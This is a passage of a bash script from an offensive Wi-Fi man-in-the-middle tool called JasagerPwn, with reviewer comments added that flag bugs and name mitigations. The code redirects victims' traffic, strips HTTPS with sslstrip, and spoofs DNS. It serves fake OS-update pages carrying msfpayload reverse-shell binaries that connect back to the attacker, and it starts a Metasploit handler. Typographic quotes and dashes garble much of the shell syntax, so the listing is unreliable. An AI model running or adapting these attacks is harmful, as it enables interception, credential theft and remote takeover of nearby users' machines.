  iptables —table nat —append PREROUTING —in-interface $FONIFACE —jump REDIRECT

  iptables —table nat —append PREROUTING —in-interface $FONIFACE

  #redirect all traffic to us

  #iptables -t nat -A PREROUTING -i $FONIFACE -j REDIRECT

  ifconfig $FONIFACE $fonIP

}

#Script update via google code

function update(){

  # Compares the revision scraped from the project's SVN page ($googleRev) with
  # the local $rev and, when the remote one is newer, re-downloads this script
  # and its resource and web files in place with `wget -N`.
  # Exits with status 1 on every path, including a successful update.
  #
  # NOTE(review): every fetch is plain http:// with no checksum or signature
  # check, and the files land over the running copy of a script that drives
  # iptables and ifconfig, so presumably runs as root. Anyone able to alter
  # that traffic, or the hosting itself, decides what executes on the next
  # run. An updater of this kind should fetch over TLS and verify a pinned
  # hash or signature before replacing anything.
  # $googleRev also goes unquoted into the numeric tests below, so whatever
  # the remote page returned is word-split before [ evaluates it.
  if [ ! $googleRev ]; then

    echo -e “\e[01;31m[!]\e[00m ERROR: Couldn’t resolve revision from google..”

    exit 1

  elif [ $googleRev -lt $rev ]; then

   echo -e “\e[01;31m[!]\e[00m UPDATE: JasagerPwn Revisions have been RESET, Please Re-Download It!”

   echo -e “\e[01;31m[!]\e[00m Command: svn checkout http://jasagerpwn.googlecode.com/svn/trunk/ jasager-pwn”

    exit 1

  elif [ $googleRev -gt $rev ]; then

    echo -e “\e[01;36m[~]\e[00m leg3nd’s JasagerPwn v$version rev$rev - Updating to rev$googleRev…”

    wget -q -N -P “$SPWD/” “http://jasagerpwn.googlecode.com/svn/trunk/jasagerPwn”

    wget -q -N -P “$SPWD/” “http://jasagerpwn.googlecode.com/svn/trunk/INSTALL_HOWTO”

    wget -q -N -P “$SPWD/src/resources/” “http://jasagerpwn.googlecode.com/svn/trunk/src/resources/persistence_dns.rb”

    wget -q -N -P “$SPWD/src/resources/” “http://jasagerpwn.googlecode.com/svn/trunk/src/deauth.sh”

    #FakeUpdate (wwwFakeUpdate)

    for Fitems in “index.php” ; do

      if [ -e “$SPWD/src/wwwFakeUpdate/” ] ; then wget -q -N -P “$SPWD/src/wwwFakeUpdate/” “http://jasagerpwn.googlecode.com/svn/trunk/src/wwwFakeUpdate/$Fitems” ; fi

    done

    #FakeUpdate MS

    for FitemsMS in “index.html” ; do

      if [ -e “$SPWD/src/wwwFakeUpdate/ms/” ] ; then wget -q -N -P “$SPWD/src/wwwFakeUpdate/ms/” “http://jasagerpwn.googlecode.com/svn/trunk/src/wwwFakeUpdate/ms/$FitemsMS” ; fi

    done

    #FakeUpdate OSX

    for FitemsOSX in “index.html” ; do

      if [ -e “$SPWD/src/wwwFakeUpdate/osx/” ] ; then wget -q -N -P “$SPWD/src/wwwFakeUpdate/osx/” “http://jasagerpwn.googlecode.com/svn/trunk/src/wwwFakeUpdate/osx/$FitemsOSX” ; fi

    done

    #FakeUpdate Linux

    for FitemsNIX in “index.html” ; do

      if [ -e “$SPWD/src/wwwFakeUpdate/ubuntu/” ] ; then wget -q -N -P “$SPWD/wwwFakeUpdate/ubuntu/” “http://jasagerpwn.googlecode.com/svn/trunk/src/wwwFakeUpdate/ubuntu/$FitemsNIX” ; fi

    done

    #JavaPwn

    for Jitems in “index.template” “index.template.plain” ; do

      if [ -e “$SPWD/src/wwwJava/” ] ; then wget -q -N -P “$SPWD/src/wwwJava/” “http://jasagerpwn.googlecode.com/svn/trunk/src/wwwJava/$Jitems” ; fi

    done

 for Jitems2 in “global.js” “index.jsp” “oo_conf_en-US.js”  ”oo_engine.js”  ”popUp.js”  ”print.css”  ”s_code_remote.js”  ”screen.css” ; do

     if [ -e “$SPWD/src/wwwJava/temp/” ] ; then wget -q -N -P “$SPWD/src/wwwJava” “http://jasagerpwn.googlecode.com/svn/trunk/src/wwwJava/temp/$Jitems2” ; fi

 done

    #Google

    for Gitems in “index.template” ; do

      if [ -e “$SPWD/src/wwwGoogle/” ] ; then wget -q -N -P “$SPWD/src/wwwGoogle/” “http://jasagerpwn.googlecode.com/svn/trunk/src/wwwGoogle/$Gitems” ; fi

    done

 for Gitems2 in “favicon.ico” “gzip.html” “js1.js” ; do

     if [ -e “$SPWD/src/wwwGoogle/temp/” ] ; then wget -q -N -P “$SPWD/wwwGoogle/temp/” “http://jasagerpwn.googlecode.com/svn/trunk/src/wwwGoogle/temp/$Gitems2” ; fi

 done

  elif [ $googleRev -eq $rev ]; then

    echo -e “\e[01;36m[~]\e[00m leg3nd’s JasagerPwn v$version rev$rev - Your Already Up To Date!”

  fi

  echo -e “\e[01;36m[~]\e[00m leg3nd’s JasagerPwn v$version rev$googleRev - All Done!”

  exit 1

}

#Full update including MSF/SET

function Fupdate(){

  echo -e “\e[01;36m[~]\e[00m leg3nd’s JasagerPwn v$version rev$googleRev - Updating Metasploit..”

  xterm -fg green -bg black -geometry 75x20+0+0 -T “JasagerPwn v$version rev$googleRev - Metaploit Update”   -e “cd $msfpath && ./msfupdate”

  echo -e “\e[01;36m[~]\e[00m leg3nd’s JasagerPwn v$version rev$googleRev - Updating SET..”

  xterm -fg green -bg black -geometry 75x20-0+0 -T “JasagerPwn v$version rev$googleRev - SET Update”   -e “cd $SETpath && python set-update”

  if [ ! $googleRev ]; then

    echo -e “\e[01;31m[!]\e[00m ERROR: Couldn’t resolve revision from google..”

    exit 1

  elif [ $googleRev -lt $rev ]; then

    echo -e “\e[01;31m[!]\e[00m ERROR: Your revision number is higher then it should be… “

    exit 1

  elif [ $googleRev -gt $rev ]; then

    echo -e “\e[01;36m[~]\e[00m leg3nd’s JasagerPwn v$version rev$rev - Updating to rev$googleRev…”

    wget -q -N -P “$SPWD/” “http://jasagerpwn.googlecode.com/svn/trunk/jasagerPwn”

    wget -q -N -P “$SPWD/” “http://jasagerpwn.googlecode.com/svn/trunk/INSTALL_HOWTO”

    wget -q -N -P “$SPWD/src/” “http://jasagerpwn.googlecode.com/svn/trunk/src/resources/persistence_dns.rb”

    wget -q -N -P “$SPWD/src/” “http://jasagerpwn.googlecode.com/svn/trunk/src/deauth.sh”

    #FakeUpdate (wwwFakeUpdate)

    for Fitems in “index.php” ; do

      if [ -e “$SPWD/src/wwwFakeUpdate/” ] ; then wget -q -N -P “$SPWD/src/wwwFakeUpdate/” “http://jasagerpwn.googlecode.com/svn/trunk/src/wwwFakeUpdate/$Fitems” ; fi

    done

    #FakeUpdate MS

    for FitemsMS in “index.html” ; do

      if [ -e “$SPWD/src/wwwFakeUpdate/ms/” ] ; then wget -q -N -P “$SPWD/src/wwwFakeUpdate/ms/” “http://jasagerpwn.googlecode.com/svn/trunk/src/wwwFakeUpdate/ms/$FitemsMS” ; fi

    done

    #FakeUpdate OSX

    for FitemsOSX in “index.html” ; do

      if [ -e “$SPWD/src/wwwFakeUpdate/osx/” ] ; then wget -q -N -P “$SPWD/src/wwwFakeUpdate/osx/” “http://jasagerpwn.googlecode.com/svn/trunk/src/wwwFakeUpdate/osx/$FitemsOSX” ; fi

    done

    #FakeUpdate Linux

    for FitemsNIX in “index.html” ; do

      if [ -e “$SPWD/src/wwwFakeUpdate/ubuntu/” ] ; then wget -q -N -P “$SPWD/wwwFakeUpdate/ubuntu/” “http://jasagerpwn.googlecode.com/svn/trunk/src/wwwFakeUpdate/ubuntu/$FitemsNIX” ; fi

    done

    #JavaPwn (wwwJava)

    for Jitems in “index.template” “index.template.plain” ; do

      if [ -e “$SPWD/src/wwwJava/” ] ; then wget -q -N -P “$SPWD/src/wwwJava/” “http://jasagerpwn.googlecode.com/svn/trunk/wwwJava/$Jitems” ; fi

    done

 for Jitems2 in “global.js” “index.jsp” “oo_conf_en-US.js”  ”oo_engine.js”  ”popUp.js”  ”print.css”  ”s_code_remote.js”  ”screen.css” ; do

     if [ -e “$SPWD/src/wwwJava/temp/” ] ; then wget -q -N -P “$SPWD/src/wwwJava” “http://jasagerpwn.googlecode.com/svn/trunk/wwwJava/temp/$Jitems2” ; fi

 done

    #Google (wwwGoogle)

    for Gitems in “index.template” ; do

      if [ -e “$SPWD/src/wwwGoogle/” ] ; then wget -q -N -P “$SPWD/src/wwwGoogle/” “http://jasagerpwn.googlecode.com/svn/trunk/wwwGoogle/$Gitems” ; fi

    done

 for Gitems2 in “favicon.ico” “gzip.html” “js1.js” ; do

     if [ -e “$SPWD/src/wwwGoogle/temp/” ] ; then wget -q -N -P “$SPWD/wwwGoogle/temp/” “http://jasagerpwn.googlecode.com/svn/trunk/wwwGoogle/temp/$Gitems2” ; fi

 done

  elif [ $googleRev -eq $rev ]; then

    echo -e “\e[01;36m[~]\e[00m leg3nd’s JasagerPwn v$version rev$rev - Your Already Up To Date!”

  fi

  echo -e “\e[01;36m[~]\e[00m leg3nd’s JasagerPwn v$version rev$googleRev - All Done!”

  exit 1

}

#function for fluid use of both SET templates

function JavaSite(){

  # Switches the APACHE_DIRECTORY line of $SETpath/config/set_config between
  # /var/www/google and /var/www/javapwn according to $javasite. Each branch
  # writes the edited config to a sibling file and then moves it over the
  # original.
  # NOTE(review): ${SETapacheDIR} prefixes the sed expression but is not
  # assigned in the part of the file visible here; presumably it is a line
  # address set elsewhere. Verify. The config path is expanded unquoted.
  GoogCheck=`cat $SETpath/config/set_config | grep “APACHE_DIRECTORY=/var/www/javapwn”`

  #1 = google   2  = java required

  if [ “$javasite” -eq “1” ] && [ “$GoogCheck” = “APACHE_DIRECTORY=/var/www/javapwn” ]; then

    sed ”${SETapacheDIR}’s!APACHE_DIRECTORY=/var/www/javapwn!APACHE_DIRECTORY=/var/www/google!’ $SETpath/config/set_config > $SETpath/config/set_configJ

    sleep 1

    mv $SETpath/config/set_configJ $SETpath/config/set_config

  elif [ “$javasite” -eq “2” ]; then

    sed ”${SETapacheDIR}’s!APACHE_DIRECTORY=/var/www/google!APACHE_DIRECTORY=/var/www/javapwn!’ $SETpath/config/set_config > $SETpath/config/set_configG

    sleep 1

    mv $SETpath/config/set_configG $SETpath/config/set_config

  fi

}

function sslstrip(){

  # Redirects TCP port 80 to $sslport, starts sslstrip listening there in an
  # xterm, opens a second xterm tailing sslstrip.log, and records the sniffing
  # state in $sniffing / $wasSniffing.
  # NOTE(review): the REDIRECT rule names no input interface, so it applies to
  # port-80 traffic arriving on every interface of this host. $! is the PID of
  # the backgrounded xterm, so TAILPID refers to the terminal window rather
  # than to tail itself.
  # Defender view: this downgrade depends on the client making a first request
  # over plain HTTP. Sites served with HSTS (preloaded ones in particular) and
  # browsers in HTTPS-only mode do not make that request, which is the
  # standard mitigation.
  iptables -t nat -A PREROUTING -p tcp —destination-port 80 -j REDIRECT —to-ports $sslport

  xterm -geometry 75x3+1-25 -bg black -fg green -e “sslstrip -l $sslport && sleep 3” &

  if [ ! -e sslstrip.log ]; then touch sslstrip.log; fi

  xterm -geometry 75x24+464+65 -bg black -fg green -T “SSLStrip Sniffing” -e “tail -f sslstrip.log” &

  TAILPID=`echo $!`

  sniffing=”1”

  wasSniffing=$sniffing

}

# Teardown handler (installed for signal 2 by the `trap` earlier in the file).
# It kills the helper processes the script started, stops Apache and the DHCP
# server, flushes the filter table, moves the *.ORIGINAL backups of the SET,
# DHCP and resolv.conf files back into place, deletes the script's /tmp files,
# archives sslstrip.log under $SPWD/collected/ and exits 0.
# NOTE(review), host hygiene:
#  - Only `iptables -F` and `iptables -X` run here, so the nat-table rules and
#    the FORWARD ACCEPT policy set by IPTABLES()/ipTableRedirect() remain after
#    exit. The host keeps forwarding and masquerading until they are cleared
#    by hand.
#  - The /tmp files removed below have fixed, predictable names in a
#    world-writable directory while the script presumably runs as root. A
#    private directory from `mktemp -d` is the usual way to avoid other local
#    users pre-creating or swapping those paths.
#  - [ -e “$SPWD/*.png” ] tests a quoted pattern, which the shell does not
#    expand, so the test only matches a file literally named `*.png`.
#  - Several PID variables ($DNSID, $dsniffID, $messageID, ...) are not set in
#    the part of the file visible here; if empty, those kill calls have no
#    target.
function cleanup() {

   echo

   echo -e “\e[01;32m[>]\e[00m Cleaning up…”

      if [ -e /tmp/dhcpd.conf ]; then rm -f /tmp/dhcpd.conf; fi 

      resolvIDs=`ps aux | grep “bash /tmp/resolv” | grep -v grep | awk ‘{ print $2 }’`

      xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing DriftNET” -e “kill `echo $resolvIDs | awk ‘{ print $1 }’` ; kill `echo $resolvIDs | awk ‘{ print $2 }’` ; kill `echo $resolvIDs | awk ‘{ print $3 }’`” &

      xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing DriftNET” -e “killall -9 driftnet” &

      xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing SSLStrip” -e “killall -9 sslstrip” &

      xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing Apache” -e “/etc/init.d/apache2 stop” &

      xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing Tail” -e “kill $DNSID” &

      xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing Dsniff” -e “kill $dsniffID” &

      xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing Tail” -e “kill $TAILPID” &

      #xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing SSL Parsing” -e “kill $parseID” &

      xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing DHCP” -e “kill $messageID” &

      xterm -geometry 75x12+464+288 -bg black -fg green -T “JasagerPwn v$version - Killing DeAuth Attacks” -e “kill $AIRDROPID && kill $AIRDUMPID && kill $airID && kill $ipID && kill $dnsID2 && kill $parseID” &

      #xterm -geometry 75x7+10+330 -T “[leg3nd-BrowserPwn] v$version - Killing DNSSpoof” -e “killall -9 dnsspoof” &

      xterm -geometry 75x7+10+330 -T “[JasagerPwn-BrowserPwn] v$version - Killing DHCP3” -e “/etc/init.d/dhcp3-server stop”

      xterm -geometry 75x7+10+330 -T “[JasagerPwn-BrowserPwn] v$version - Killing URLSnarf” -e “killall -9 urlsnarf”

      xterm -geometry 75x7+10+330 -T “[JasagerPwn-BrowserPwn] v$version - Killing DSniff” -e “killall -9 dsniff”

      xterm -geometry 75x8+100+0 -T “v$version - Killing ‘IPtables’” -e “iptables -F” &

      xterm -geometry 75x8+100+0 -T “v$version - Killing ‘IPtables’” -e “iptables -X” &

      #Clean up our cfgs

      if [ -e “$PWD/dsniff.services” ]; then rm “$PWD/dsniff.services” ; fi 

      if [ -e “$SPWD/*.png” ]; then rm “$SPWD/*.png” ; fi

      if [ -d “$SETpath/src/html/templates/java/temp/” ]; then rm -rf $SETpath/src/html/templates/java/temp/ ; fi

      if [ -d “$SETpath/src/html/templates/google/temp/” ]; then rm -rf $SETpath/src/html/templates/google/temp/ ; fi

      if [ -e “$SETpath/src/html/templates/java/index.template” ] && [ -e “$SETpath/src/html/templates/java/index.template.ORIGINAL” ]; then

        mv “$SETpath/src/html/templates/java/index.template.ORIGINAL” “$SETpath/src/html/templates/java/index.template”

      fi

      APACHEDIR=`cat $SETpath/config/set_config | grep “/var/www/javapwn”`

      if [ -e “$SETpath/src/html/templates/google/index.template.ORIGINAL” ] ; then mv $SETpath/src/html/templates/google/index.template.ORIGINAL $SETpath/src/html/templates/google/index.template ; fi

      if [ -e “$SETpath/src/html/templates/java/index.template.ORIGINAL” ] ; then mv $SETpath/src/html/templates/java/index.template.ORIGINAL $SETpath/src/html/templates/java/index.template ; fi

      if [ -e “$SETpath/config/set_config.ORIGINAL” ] ; then mv $SETpath/config/set_config.ORIGINAL $SETpath/config/set_config ; fi

      if [ -e “/etc/dhcp3/dhcpd.conf” ] && [  -e “/etc/dhcp3/dhcpd.conf.ORIGINAL” ] ; then rm /etc/dhcp3/dhcpd.conf && mv /etc/dhcp3/dhcpd.conf.ORIGINAL /etc/dhcp3/dhcpd.conf ; fi

      if [ -e “/etc/resolv.conf” ] && [  -e “/etc/resolv.conf.ORIGINAL” ] ; then rm /etc/resolv.conf && mv /etc/resolv.conf.ORIGINAL /etc/resolv.conf ; fi

      if [ -e “$SPWD/src/wwwFakeUpdate/ubuntu/index.html.ORIGINAL” ] ; then cp -f $SPWD/src/wwwFakeUpdate/ubuntu/index.html.ORIGINAL $SPWD/src/wwwFakeUpdate/ubuntu/index.html ; fi

      if [ -e “$SPWD/src/wwwFakeUpdate/osx/index.html.ORIGINAL” ] ; then cp -f $SPWD/src/wwwFakeUpdate/osx/index.html.ORIGINAL $SPWD/src/wwwFakeUpdate/osx/index.html ; fi

      if [ -e “/tmp/msfrcBP” ]; then rm “/tmp/msfrcBP”; fi

      if [ -e “/tmp/msfrcFU” ]; then rm “/tmp/msfrcFU”; fi

      if [ -e “/tmp/jasagerpwn.dns” ]; then rm “/tmp/jasagerpwn.dns”; fi

      if [ -e “/tmp/deauth.conf” ]; then rm “/tmp/deauth.conf”; fi

      if [ -e “/tmp/auto-google2” ]; then rm “/tmp/auto-google2”; fi

      if [ -e “/tmp/auto-java2” ]; then rm “/tmp/auto-java2”; fi

      if [ -e “/tmp/resolv.sh” ]; then rm “/tmp/resolv.sh”; fi

      if [ -e “$SPWD/sslstrip.log” ]; then mv “$SPWD/sslstrip.log” “$SPWD/collected/$NOW-sslstrip.log”; fi

      xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing Self” -e “killall -9 jasagerPwn” &

   echo -e “\e[01;36m[~]\e[00m Exiting with elegance..”

   exit 0

}

# Starts the "FakeUpdate" mode: removes stale payload files, regenerates the
# OS X and Linux payload binaries under $Fwww with msfpayload, launches an
# msfconsole handler from /tmp/msfrcFU, calls ipTableRedirect, restarts
# dnsspoof on $FONIFACE with /tmp/jasagerpwn.dns, restarts Apache with only the
# `fakeupdate` site enabled, and sets $fakeupdate to 1.
# NOTE(review): the first four existence checks use $pwd (lowercase), which is
# not assigned in the part of the file visible here. The working-directory
# variable set earlier is $SPWD, so those checks presumably never match.
# Verify. /tmp/msfrcFU and /tmp/jasagerpwn.dns are fixed names in a
# world-writable directory that are read here as configuration.
# Defender view: clients are steered by spoofed DNS answers to a page served
# over plain HTTP that offers an executable under an OS-update file name.
# Genuine OS updates arrive through the platform's own updater as signed
# packages, so a browser-delivered "update" binary is the indicator to block
# on and to train users against.
function fakeupdate(){

    ourIP=`ifconfig $FONIFACE | awk ‘/inet addr/ {split ($2,A,”:”); print A[2]}’`

    if [ -e “$pwd/src/wwwFakeUpdate/ms/Windows-KB183905-x86-ENU.exe” ]; then rm -f “$pwd/src/wwwFakeUpdate/ms/Windows-KB183905-x86-ENU.exe”; fi

    if [ -e “$pwd/src/wwwFakeUpdate/osx/SecurityUpdate1-83-90-5.dmg.bin” ]; then rm -f “$pwd/src/wwwFakeUpdate/osx/SecurityUpdate1-83-90-5.dmg.bin”; fi

    if [ -e “$pwd/src/wwwFakeUpdate/ubuntu/USN1228.bin” ]; then rm -f “$pwd/src/wwwFakeUpdate/ubuntu/USN1228.bin”; fi

    if [ -e “$pwd/src/wwwFakeUpdate/ubuntu/nix.bin” ]; then rm -f “$pwd/src/wwwFakeUpdate/ubuntu/nix.bin”; fi

    if [ -e “$Fwww/osx/SecurityUpdate1-83-90-5.dmg.bin” ]; then rm -f “$Fwww/osx/SecurityUpdate1-83-90-5.dmg.bin”; fi

    if [ -e “$Fwww/ubuntu/USN1228.bin” ]; then rm -f “$Fwww/ubuntu/USN1228.bin”; fi

    if [ -e “$Fwww/ubuntu/nix.bin” ]; then rm -f “$Fwww/ubuntu/nix.bin”; fi

    #xterm -geometry 75x15+10+0 -bg black -fg green -T “[Metasploit Payload] v$version - Metasploit (OSX)” -e “msfpayload osx/x86/shell_reverse_tcp LPORT=$osxPORT LHOST=$fonIP X > $Fwww/osx/SecurityUpdate1-83-90-5.dmg.bin”

    xterm -geometry 75x15+10+0 -bg black -fg green -T “[Metasploit Payload] v$version - Metasploit (OSX)” -e “msfpayload osx/x86/shell_reverse_tcp LPORT=$osxPORT LHOST=$fonIP X > $Fwww/osx/osx.bin”

    #xterm -geometry 75x15+10+0 -bg black -fg green -T “[Metasploit Payload] v$version - Metasploit (Linux)” -e “msfpayload linux/x86/shell_reverse_tcp LPORT=$nixPORT LHOST=$fonIP X  > $Fwww/ubuntu/USN1228.bin”

    xterm -geometry 75x15+10+0 -bg black -fg green -T “[Metasploit Payload] v$version - Metasploit (Linux)” -e “msfpayload linux/x86/shell/reverse_tcp LPORT=$nixPORT LHOST=$fonIP X  > $Fwww/ubuntu/nix.bin”

    sleep .5 && xterm -geometry 110x42+464-38 -bg black -fg green -T “[Metasploit Handler] v$version - Metasploit” -e “msfconsole -r /tmp/msfrcFU” &

    echo -e “\e[01;33m[!]\e[00m Forcing LAN to visit our site…”

    ipTableRedirect

    xterm -geometry 75x7+10+330 -bg black -fg green -T “[JasagerPwn-DNS Kill] v$version - Killing DNSSpoof” -e “killall -9 dnsspoof” &

    sleep .5 && xterm -geometry 75x7+0-36 -bg black -fg green -T “[JasagerPwn-DNS Spoof] v$version - DNSSpoof” -e “dnsspoof -i $FONIFACE -f /tmp/jasagerpwn.dns” &

    echo -e “\e[01;33m[>]\e[00m Starting Web Server @ $fonIP:80…”

    xterm -geometry 75x8+100+0 -T “v$version - Starting Apache2” -e “/etc/init.d/apache2 restart”

    service apache2 restart > /dev/null

    sleep .5

    xterm -geometry 75x8+100+0 -T “v$version - Starting Apache2” -e “ls /etc/apache2/sites-available/ | xargs a2dissite && a2ensite fakeupdate && a2enmod php5 && /etc/init.d/apache2 reload”

    fakeupdate=”1”

}

#had to add another fuction becuase of the MSF-RC file , probably a more elegant way to approach this.

# Interactive prompt shown while the FakeUpdate mode is active.
# Leaves the loop immediately when $browserpwn or $javaATK equals 1.
# [S]/1: removes the NAT PREROUTING rules on $FONIFACE, calls IPTABLES
#        (defined elsewhere in this script), kills dnsspoof, stops Apache,
#        sets fakeupdate to 0 and leaves the loop.
# [M]/2: leaves the loop without touching anything.
# Globals: browserpwn, javaATK, wasSniffing, FONIFACE, fonIP, version (read);
#          fakeupdate, USR_CHOICE96 (written).
# NOTE(review): the typographic quotes and long dashes in this listing are not
# shell syntax; they look like a rendering artifact of the page - confirm
# against the original file before relying on any line here.
function updateLoop(){

  while true

  do

    # Unquoted numeric tests: an unset flag makes "[" report an error here.
    if [ $browserpwn -eq 1 ]; then break; fi

    if [ $javaATK -eq 1 ]; then break; fi

    echo

    echo -e “\e[01;33m[MODE][==========-FakeUpdate Attack-==========][!]\e[00m”

    #read -r -p “[?] Enter [I] to give Internet back or [M] for Main Menu: ” USR_CHOICE1

    echo -e -n “\e[01;33m[!]\e[00m [S][1] to Stop Attack or [M][2] for Main Menu: “

    # read without -r interprets backslashes in the typed answer.
    read -e USR_CHOICE96

    case $USR_CHOICE96 in

      S|s|Stop|stop|1)

# Teardown: three progressively more specific deletes of the PREROUTING
# redirect on $FONIFACE; each runs in its own xterm and its result is not checked.
xterm -geometry 75x7+10+330 -bg black -fg green -T “[JasagerPwn-IPTABLES] v$version” -e “iptables —table nat —delete PREROUTING —in-interface $FONIFACE”

xterm -geometry 75x7+10+330 -bg black -fg green -T “[JasagerPwn-IPTABLES] v$version” -e “iptables —table nat —delete PREROUTING —in-interface $FONIFACE —jump REDIRECT”

xterm -geometry 75x7+10+330 -bg black -fg green -T “[JasagerPwn-IPTABLES] v$version” -e “iptables —table nat —delete PREROUTING —in-interface $FONIFACE —proto tcp —jump DNAT —to $fonIP”

# IPTABLES is not defined in this part of the file; presumably it re-applies
# the baseline rule set - verify against its definition.
IPTABLES

# SIGKILL goes to every dnsspoof process on the host, not only the one this
# script started.
xterm -geometry 75x7+10+330 -bg black -fg green -T “[JasagerPwn-DNS Kill] v$version” -e “killall -9 dnsspoof” &

xterm -geometry 75x5+0+94 -bg black -fg green -T “[JasagerPwn-Apache Kill] v$version” -e “/etc/init.d/apache2 stop” &

fakeupdate=”0”

# sslstrip here is presumably the helper defined elsewhere in the script,
# re-entered when sniffing was active before this mode - TODO confirm.
if [ $wasSniffing != “0” ]; then sslstrip ; fi

# The reminder implies that clients may still hold the spoofed DNS answers in
# their resolver cache after the teardown above; stopping the tool does not
# clean the clients.
echo -e “\e[01;33m[!]\e[00m DONT FORGET TO RUN ‘ipconfig /flushdns’ ON VICTIM!!”

break

      ;;

      M|m|Menu|menu|2)

break

      ;;

      *) echo -e “\e[01;31m[!]\e[00m Error: Please Choose From The Menu..”

    esac

  done

}

# Parse command-line switches. Switches followed by ":" in the getopts string
# take an argument, which is stored unvalidated in the variable shown:
#   -a autoMetScript  -p Pport  -d WiFiMODE  -i IFACE  -w WIFACE
#   -m macMode        -s fakeMac
# -h calls help; -u and -U call update / Fupdate (all three are defined
# elsewhere in this script).
# NOTE(review): the -i and -w values are expanded unquoted in the ifconfig and
# grep commands that follow this loop, so they should be checked against the
# real interface list before use.
while getopts “a:p:i:w:m:s:d:h?uU” OPTIONS; do

  case ${OPTIONS} in

    a ) autoMetScript=”$OPTARG” ;;

    p ) Pport=”$OPTARG” ;;

    d ) WiFiMODE=”$OPTARG” ;;

    i ) IFACE=”$OPTARG” ;;

    w ) WIFACE=”$OPTARG” ;;

    h ) help ;;

    m ) macMode=”$OPTARG” ;;

    s ) fakeMac=”$OPTARG” ;;

    u ) update ;;

    U ) Fupdate ;;

    # getopts reports an unknown switch as "?"; unquoted, "?" is also a glob
    # that matches any single character, so the "*" arm below is never reached.
    ? ) help ;;

    * ) echo -e “\e[01;31m[!]\e[00m Error: Unknown Switch Option” 1>&2 ;; # Default

  esac

done

# Bring the wireless interface up and collect the interface facts the later
# checks compare against. All of this runs before the root check further down.
ifconfig $WIFACE up && sleep .5

# awk matches the routing-table line starting with 0.0.0.0, then getline moves
# to the following line and prints its second field.
# NOTE(review): that prints the gateway column of the line AFTER the default
# route - confirm this is intended.
gatewayIP=`route -n | awk ‘/^0.0.0.0/ {getline; print $2}’`

# grep is unanchored and the variable unquoted: "wlan0" also matches "wlan0mon",
# in which case several names are captured and the equality test below fails.
WIFcheck=`ifconfig | grep $WIFACE | awk ‘{ print $1 }’`

IFcheck=`ifconfig | grep $IFACE | awk ‘{ print $1 }’`

ifconfig $FONIFACE $fonIP

#make sure our IP doesnt get screwy from any dhcp..

# Background loop that re-assigns $fonIP to $FONIFACE every second for as long
# as ifconfig succeeds; its PID is kept in ipID so it can be stopped later.
while true ; do ifconfig $FONIFACE $fonIP && sleep 1 ; done &

ipID=`echo $!`

# Same command as above; the second assignment overwrites the first.
gatewayIP=`route -n | awk ‘/^0.0.0.0/ {getline; print $2}’`

#check for required interfaces

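# Abort when either required interface is missing from the ifconfig output.
# A fatal condition must not look like success to whatever launched the
# script, so the message goes to stderr and the exit status is non-zero.
# The address-reassignment loop started earlier in this script (PID in $ipID)
# is stopped first; otherwise it keeps running after the script has exited.
if [ "$WIFcheck" != "$WIFACE" ]; then

  echo -e "\e[01;31m[!]\e[00m FATAL: Cannot Locate $WIFACE…" >&2

  if [ -n "$ipID" ]; then kill "$ipID" 2>/dev/null; fi

  exit 1

fi

if [ "$IFcheck" != "$IFACE" ]; then

  echo -e "\e[01;31m[!]\e[00m FATAL: Cannot Locate $IFACE…" >&2

  if [ -n "$ipID" ]; then kill "$ipID" 2>/dev/null; fi

  exit 1

fi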

#——————————————————————————————————————

#=========================-Begin STDOUT-=====================================

# Startup: print the banner, then stop every service and tool that could
# conflict with a fresh run. Each command runs in its own xterm and its exit
# status is not checked.
# NOTE(review): these commands run before the root check further down, and
# killall -9 sends SIGKILL to every matching process on the host (wicd,
# dhclient, ...), not only to ones started by a previous run of this script.
clear

echo

echo

#Startup banner

cat “$SPWD/src/resources/banner”

echo

echo -e “\e[01;32m[>]\e[00m Stopping services and programs…”

xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing ‘DHCP3 Service’” -e “/etc/init.d/dhcp3-server stop”

xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing Sniffing Apps” -e “killall -9 dhcpd3 airbase-ng ettercap sslstrip driftnet urlsnarf” 

xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing DNS Spoof” -e “killall -9 dnsspoof”

xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing WICD” -e “killall -9 wicd && killall -9 wicd-client”

xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing WICD” -e “/etc/init.d/wicd stop”

# The next two windows reuse the "Killing WICD" title but kill the DHCP clients.
xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing WICD” -e “killall -9 dhclient”

xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing WICD” -e “killall -9 dhclient3”

# PIDs of any "bash /tmp/resolv..." process still present (the resolv.conf
# rewrite loop this script starts later); at most the first three are killed,
# and the window title says DriftNET although the targets are those PIDs.
resolvIDs=`ps aux | grep “bash /tmp/resolv” | grep -v grep | awk ‘{ print $2 }’`

xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing DriftNET” -e “kill `echo $resolvIDs | awk ‘{ print $1 }’` ; kill `echo $resolvIDs | awk ‘{ print $2 }’` ; kill `echo $resolvIDs | awk ‘{ print $3 }’`” &

# Environment check: require root, then record which packages dpkg knows about.
echo -e “\e[01;32m[>]\e[00m Checking Environment…”

#Check for root

# NOTE(review): this check comes after the interface changes and kill commands
# above, so a non-root run has already attempted privileged operations by the
# time it is rejected. cleanup is defined elsewhere in this script.
if [ “$(id -u)” != “0” ]; then echo -e “\e[01;31m[!]\e[00m FATAL: Not Root..” && cleanup ; fi

#Dependencies checks

# Each variable holds the first package name from `dpkg -l` whose line contains
# the search word, or is empty when nothing matches. The match is a substring
# on the whole line, so a related package (for example a library) also counts,
# and a package listed as removed-but-configured is treated as installed.
dhcp3check=`dpkg -l | grep dhcp3-server | awk ‘{print $2}’ | head -n 1`

apache2check=`dpkg -l | grep apache2 | awk ‘{print $2}’ | head -n 1`

